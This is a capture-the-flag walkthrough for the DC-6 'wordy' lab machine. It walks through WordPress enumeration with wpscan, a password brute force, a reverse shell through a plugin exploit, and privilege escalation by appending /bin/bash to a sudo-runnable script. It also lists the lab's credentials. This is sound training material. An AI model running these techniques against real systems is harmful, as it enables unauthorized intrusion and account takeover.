Enumeration
nmap
nmap -sC -sV -oA nmap/DC6 192.168.1.115
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 07:20 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 07:20 (0:00:00 remaining)
Nmap scan report for wordy (192.168.1.115)
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:EC:F5:FF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds
After that, as usual, we put the IP to the address bar and see what we got
We can see the URL there has a domain called wordy.
Let's navigate to the /etc/hosts and add the IP into it.
Reload the browser.
We got a wordpress file!
Dirb
dirb http://192.168.1.115
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 18 07:56:05 2020
URL_BASE: http://192.168.1.115/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.115/ ----
+ http://192.168.1.115/index.php (CODE:200|SIZE:53227)
+ http://192.168.1.115/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.115/wp-admin/
==> DIRECTORY: http://192.168.1.115/wp-content/
==> DIRECTORY: http://192.168.1.115/wp-includes/
+ http://192.168.1.115/xmlrpc.php (CODE:405|SIZE:42)
As we can see we can navigate to wp-admin and it will redirect us to the login form.
After poking around I still can't find anything interesting
wpscan
wpscan --url http://wordy --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wordy/ [192.168.1.115]
[+] Started: Mon May 18 08:00:12 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 172.594 MB
[+] Elapsed time: 00:00:03
We can see that there are 5 usernames available, admin, graham, mark, sarah and jens.
Let's put it inside a text file.
Then at wpscan, type
wpscan http://192.168.1.115/wp-login --usernames name.txt --passwords pass.txt
Then we can run the command
We get a username and password and that is mark and helpdesk01
Let's login to the wordpress
We've successfully logged in to the account.
Exploitation
Searchsploit
Since we got the Activity monitor plugins, so I went to searchsploit to search for the exploit.
The exploit that what we want is the third one.
Copy the file to a directory that we can access later.
Then nano into that file
We can see that there is a reverse shell will be called after we execute the file.
Change the URL from localhost to wordy and the reverse shell to your IP and the port that you want to put.
We first set up the listener at our machine
Then open the file
Click submit request
Then we got a shell, type
python -c 'import pty; pty.spawn("/bin/bash")'
to get a proper shell.
Then navigate to /home/mark/stuff. We got a file called things-to-do.txt
Open up and we will see something inside.
We see that there is a graham user and his password, GSo7isUM1D4. Let's logout and ssh to graham
Privilege Escalation
When we type sudo -l, we can see this
It seems like we need jens user to run this thing.
Append /bin/bash to the backups.sh file in order to let us get a shell when we switch to jens user
Then, type
sudo -u jens /home/jens/backups.sh
We successfully got to jens user, then we type sudo -l again and got this
Follow the instruction given
We got root !
Navigate to the /root to get the flag
Congratulation !
